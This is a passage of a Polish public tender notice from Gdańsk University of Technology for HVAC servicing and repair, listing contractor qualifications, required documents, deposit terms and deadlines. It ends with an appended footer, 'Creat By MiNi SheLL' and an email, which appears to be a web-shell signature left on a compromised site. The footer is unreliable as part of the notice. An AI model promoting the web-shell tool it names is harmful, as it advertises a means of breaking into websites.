2158).<br/>2) zdolności technicznej lub zawodowej<br/>I. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat, przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, Wykonawca wykonał lub<br/>wykonuje minimum trzy usługi przeglądów serwisowych, konserwacji i napraw urządzeń klimatyzacji i wentylacji o łącznej<br/>wartości nie mniejszej niż 500.000,00 zł brutto (słownie: pięćset tysięcy zł 00/100).<br/>II. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:<br/>a) co najmniej 4 osobami, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada kwalifikacje w<br/>rozumieniu Ustawy Prawo Energetyczne z dnia 6 kwietnia 2020 r. (Dz.U. z 2020 r. poz. 833) art. 54, poświadczone<br/>świadectwem kwalifikacyjnym w rozumieniu Rozporządzenia Ministra Gospodarki, Pracy I Polityki Społecznej w Sprawie<br/>Szczegółowych Zasad Stwierdzania Posiadania Kwalifikacji Przez Osoby Zajmujące Się Eksploatacją Urządzeń, Instalacji I<br/>Sieci z dnia 28 kwietnia 2003 r. (Dz.U. Nr 89, poz. 828) w zakresie:<br/>􀀁􀀁 grupa G1 - do wykonania prac na stanowisku: eksploatacji i konserwacji sieci, urządzeń i instalacji elektrycznych o<br/>napięciu do 1 kV,<br/>􀀁􀀁 grupa G2 - eksploatacja i konserwacja urządzeń chłodniczych o mocy do 50 kW.<br/>b) co najmniej 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia, z których każda posiada kwalifikacje w<br/>rozumieniu Ustawy Prawo Energetyczne z dnia 6 kwietnia 2020 r. (Dz.U. z 2020 r. poz. 833) art. 54, poświadczone<br/>świadectwem kwalifikacyjnym w rozumieniu Rozporządzenia Ministra Gospodarki, Pracy I Polityki Społecznej w Sprawie<br/>Szczegółowych Zasad Stwierdzania Posiadania Kwalifikacji Przez Osoby Zajmujące Się Eksploatacją Urządzeń, Instalacji I<br/>Sieci z dnia 28 kwietnia 2003 r. (Dz.U. Nr 89, poz. 828) w zakresie:<br/>􀀁􀀁 grupa G1 - do wykonania prac na stanowisku: eksploatacji i konserwacji urządzeń elektrycznych w wykonaniu<br/>przeciwwybuchowym.<br/>Zamawiający uzna za wystarczające jeżeli wykonawca przedstawi łącznie 4 osoby, przy czym:<br/>􀀁􀀁 dwie z przedstawionych osób będą posiadały jednocześnie uprawnienia opisane w punktach a) i b);<br/>􀀁􀀁 każda z przedstawionych osób posiada „certyfikat dla personelu”, o którym mowa w art. 20 w wyżej wymienionej<br/>ustawie z<br/>dnia 15 maja 2015 r. o substancjach zubażających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych 􀀁􀀁 każda z przedstawionych osób posiada aktualne badania lekarskie dopuszczające do pracy na wysokości;<br/>􀀁􀀁 co najmniej jedna z przedstawionych osób będzie wyznaczona na kierownika grupy i dodatkowo posiada uprawnienia<br/>G1<br/>i G2 w ww. zakresie na stanowisko dozoru.<br/>2. Ocena spełnienia przez Wykonawcę tego warunku udziału w postępowaniu dokonana będzie na podstawie złożonego<br/>przez Wykonawcę „Wykazu wykonanych dostaw” wraz z dowodami złożonymi na potwierdzenie należytego wykonania<br/>dostaw oraz „Wykazu osób” skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - WYKONAWCA<br/>SKŁADA NA WEZWANIE ZAMAWIAJĄCEGO <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie, w zakresie<br/>art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz usług wykonanych,<br/>a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu zamówienia, daty wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dowody zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych<br/>są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga, by wykonawca złożył wraz z ofertą przedmiotowe środki dowodowe. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz Oferty - wypełniony i przesłany w formie lub postaci elektronicznej, sporządzony z wykorzystaniem wzoru<br/>stanowiącego Załącznik nr 1 do SWZ,<br/>2) Formularz rzeczowo-cenowy, sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 2 do SWZ; Dokument<br/>stanowi treść oferty i nie podlega uzupełnieniu,<br/>3) Pełnomocnictwa (jeżeli dotyczy),<br/>4) Dokument elektroniczny potwierdzający wniesienie wadium - w przypadku wnoszenia wadium w formie innej niż pieniądz <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy Wykonawca składający ofertę zobowiązany jest przed upływem terminu składania ofert zabezpieczyć swą ofertę<br/>wadium w wysokości: 15 000,00 zł.<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego:<br/>nr 91 1240 6292 1111 0011 0582 9419, PEKAO S.A. II O. W GDAŃSKU, z dopiskiem: „WADIUM – Wykonanie przeglądów serwisowych, konserwacji i napraw agregatów chłodniczych, central wentylacyjnych,<br/>nawilżaczy, klimatyzatorów, wentylatorów w budynkach Politechniki Gdańskiej - ZP/102/055/U/24”<br/>4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć, najpóźniej przed upływem terminu<br/>składania ofert. Zamawiający będzie uważał za skuteczne wniesienie wadium tylko wówczas, gdy bank prowadzący<br/>rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.<br/>5. W przypadku wnoszenia wadium w innej formie niż w pieniądzu, Wykonawca przekazuje Zamawiającemu wraz z ofertą<br/>oryginał dokumentu wadialnego (gwarancji lub poręczenia) w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym przez uprawnionego pracownika gwaranta/poręczyciela.<br/>6. W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji, dokument ten powinien być<br/>sporządzony zgodnie z obowiązującym prawem i winien zawierać w swej treści:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją (dokładne określenie nazwy zamówienia),<br/>3) kwotę zobowiązania,<br/>4) termin ważności gwarancji,<br/>5) mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne żądanie Zamawiającego,<br/>6) być nieodwołalny<br/>7) zobowiązanie gwaranta do zapłaty kwoty gwarancji na każde pisemne żądanie Zamawiającego zawierające<br/>oświadczenie, iż Wykonawca, którego ofertę wybrano:<br/>a) odmówił podpisania umowy na warunkach określonych w ofercie, lub<br/>b) nie wniósł zabezpieczenia należytego wykonania umowy, lub<br/>c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br/>d) w odpowiedzi na wezwanie do złożenia lub uzupełnienia przedmiotowych środków dowodowych lub do uzupełnienia<br/>podmiotowych środków dowodowych, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych<br/>lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1,<br/>oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na<br/>poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty<br/>złożonej przez wykonawcę jako najkorzystniejszej;<br/>7. Zamawiający dokona zwrotu wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dna wystąpienia<br/>okoliczności określonych w art. 98 ust.1 Ustawy Pzp.<br/>8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku dokona zwrotu wadium<br/>wykonawcy w okoliczności określonych w art. 98 ust. 2 Ustawy Pzp.<br/>9. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 98<br/>ust. 1 i 2 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza.<br/>Wykonawca wnosi wówczas wadium w terminie określonym przez Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia, a oferta taka spełniać musi następujące<br/>wymagania:1) Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2) wypełniając Formularz oferty, jak również inne dokumenty powołujące się na „Wykonawcę”; w miejscu „np. nazwa i adres<br/>Wykonawcy” należy wpisać dane Wykonawców wspólnie ubiegających się o zamówienie,3) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia solidarnie odpowiadają za podpisanie i wykonanie umowy,4) w ofercie powinien być<br/>podany adres do korespondencji i kontakt telefoniczny z Pełnomocnikiem Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako<br/>Pełnomocnik, 5) w odniesieniu do wymagań postawionych przez Zamawiającego każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia oddzielnie musi udokumentować, że nie podlega wykluczeniu - każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego składa<br/>oświadczenie, o którym mowa w rozdziale 6 SWZ6) sposób składania dokumentów w ofercie wspólnej: a) dokumenty<br/>dotyczące własnej firmy składa każdy z Wykonawców składających ofertę wspólną w imieniu swojej firmy, b) dokumenty<br/>wspólne takie jak np. formularz oferty, wykaz dostaw, wykaz osób - składa Pełnomocnik Wykonawców w imieniu wszystkich<br/>Wykonawców składających ofertę wspólną, c) W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. d) W przypadku, o którym mowa w pkt. 6 lit. c), wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni<br/>wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy<br/>mogą nastąpić jedynie zgodnie z art. 454 i 455 Ustawy Pzp.<br/>2. Zamawiający zastrzega możliwość dokonania następujących zmian w umowie:<br/>1) przedłużenia terminu realizacji umowy w przypadku niewykorzystania przez Zamawiającego zakresu rzeczowego lub<br/>kwotowego umowy, łącznie z opcją;<br/>2) zmiany cen w trakcie obowiązywania umowy w przypadku zmiany obowiązujących na terenie Rzeczypospolitej Polskiej<br/>przepisów dotyczących wysokości stawek podatku od towarów i usług (VAT) w zakresie obejmującym przedmiot umowy -<br/>płatności będą się odbywać z uwzględnieniem stawki VAT obowiązującej w dniu wystawienia faktury;<br/>3) zmiany osób reprezentujących strony w przypadku wystąpienia nieprzewidzianych okoliczności (tj. choroba, wypadki<br/>losowe, nieprzewidziane zmiany organizacyjne);<br/>4) zmiany danych teleadresowych zapisanych w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć drogą elektroniczną za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/pg_edu/proceedings na stronie dotyczącej przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-13 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 60 i art. 121 Ustawy Pzp Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę wymienionych poniżej kluczowych zadań:<br/>1).	W toku każdego przeglądu serwisowego agregatów chłodniczych Wykonawca musi osobiście wykonywać czynności.<br/>2).	W toku każdego przeglądu serwisowego central wentylacyjnych w zależności od wbudowanych sekcji Wykonawca musi osobiście wykonywać czynności.<br/>3).	W toku każdego przeglądu serwisowego klimatyzatorów Wykonawca musi osobiście wykonywać czynności.<br/>4).	W toku każdego przeglądu serwisowego wentylatorów Wykonawca musi osobiście wykonywać czynności.<br/>5).	W toku każdego przeglądu serwisowego nawilżaczy Wykonawca musi osobiście wykonywać czynności.<br/><br/>Stosownie do art. 95 ustawy pzp, Zamawiający wymaga zatrudnienia na podstawie stosunku pracy przez Wykonawcę lub<br/>podwykonawcę, osób wykonujących wskazane poniżej czynności w trakcie realizacji przedmiotu umowy:<br/>1). W zakresie wykonywania konserwacji przeglądy mające na celu:<br/>a) kontrolę ogólnego stanu urządzenia;<br/>b) kontrolę poprawności działania i ewentualną regulację poszczególnych charakterystycznych elementów urządzenia<br/>odpowiedzialnych za transport powietrza, filtrację powietrza, zmianę parametru temperatury lub wilgotności powietrza;<br/>c) czyszczenie poszczególnych charakterystycznych elementów urządzenia odpowiedzialnych za transport powietrza,<br/>filtrację powietrza, zmianę parametru temperatury lub wilgotności powietrza, odprowadzenie skroplin z urządzenia;<br/>d) wymianę filtrów na nowe oraz wywóz z terenu Politechniki Gdańskiej i utylizacje filtrów zdemontowanych w trakcie<br/>wykonywania zakresu niniejszej umowy;<br/>e) sprawdzenie stanu połączeń elektrycznych urządzenia i ich konserwacja;<br/>f) sporządzenie protokołu z wykonanej konserwacji i uzyskanie potwierdzenia wykonanej konserwacji u uprawnionego<br/>przedstawiciela Zamawiającego;<br/>g) dokonywanie wpisu z wykonywanych czynności do Centralnego Rejestru Operatorów.<br/>2). W zakresie wykonywania napraw mające na celu:<br/>a) dokonanie oględzin urządzenia i diagnozy usterki;<br/>b) przedstawienie przedstawicielowi Zamawiającego do akceptacji rozwiązania i kalkulacje kosztów naprawy;<br/>c) wymiana uszkodzonych elementów/urządzeń poszczególnych systemów na nowe (sprężarka, wentylator, jednostka zew.<br/>klimatyzacji, wymiennik, siłowniki, przepustnice, itp.)<br/>d) wykonanie naprawy wg ustaleń z Zamawiającym i warunkami umowy;<br/>e) sporządzenie protokołu z wykonanej naprawy i uzyskanie potwierdzenia wykonanej konserwacji u uprawnionego<br/>przedstawiciela Zamawiającego;<br/>f) dokonywanie wpisu z wykonywanych czynności do Centralnego Rejestru Operatorów.

Creat By MiNi SheLL
Email: jattceo@gmail.com